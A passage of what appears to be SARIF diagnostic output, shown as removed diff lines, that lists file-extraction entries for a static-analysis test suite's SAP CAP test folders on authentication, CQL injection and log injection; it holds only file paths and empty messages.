"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", - "uriBaseId" : 
"%SRCROOT%", - "index" : 44 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 45 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 46 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 47 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 48 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 49 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 50 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 51 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" 
- } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/default-is-privileged/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 52 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 53 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 54 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 55 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - 
"index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/privileged-user.js", - "uriBaseId" : "%SRCROOT%", - "index" : 56 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 57 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 58 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" 
: 59 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/dynamically-generated-privileged/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 60 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 61 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 62 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 63 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 64 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 65 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 66 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } 
- }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 67 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 68 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 69 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 70 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 
- } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 71 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 72 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 73 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 74 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : 
"js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 75 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 76 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 77 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 78 - } - } - } 
], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 79 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 80 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 1 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js", - "uriBaseId" 
: "%SRCROOT%", - "index" : 81 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 82 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 83 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 84 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : 
"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 85 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 86 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 87 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", - "uriBaseId" : "%SRCROOT%", - "index" : 2 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - 
"physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 88 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 89 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 90 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 91 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { 
- "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 92 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 93 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.js", - "uriBaseId" : "%SRCROOT%", - "index" : 94 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 95 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - 
"toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/package.json", - "uriBaseId" : "%SRCROOT%", - "index" : 96 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/server.js", - "uriBaseId" : "%SRCROOT%", - "index" : 97 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 98 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 99 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : 
"js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js", - "uriBaseId" : "%SRCROOT%", - "index" : 100 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 101 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - "physicalLocation" : { - "artifactLocation" : { - "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds.json", - "uriBaseId" : "%SRCROOT%", - "index" : 102 - } - } - } ], - "message" : { - "text" : "" - }, - "level" : "none", - "descriptor" : { - "id" : "js/diagnostics/successfully-extracted-files", - "index" : 1, - "toolComponent" : { - "index" : 3 - } - }, - "properties" : { - "formattedMessage" : { - "text" : "" - } - } - }, { - "locations" : [ { - 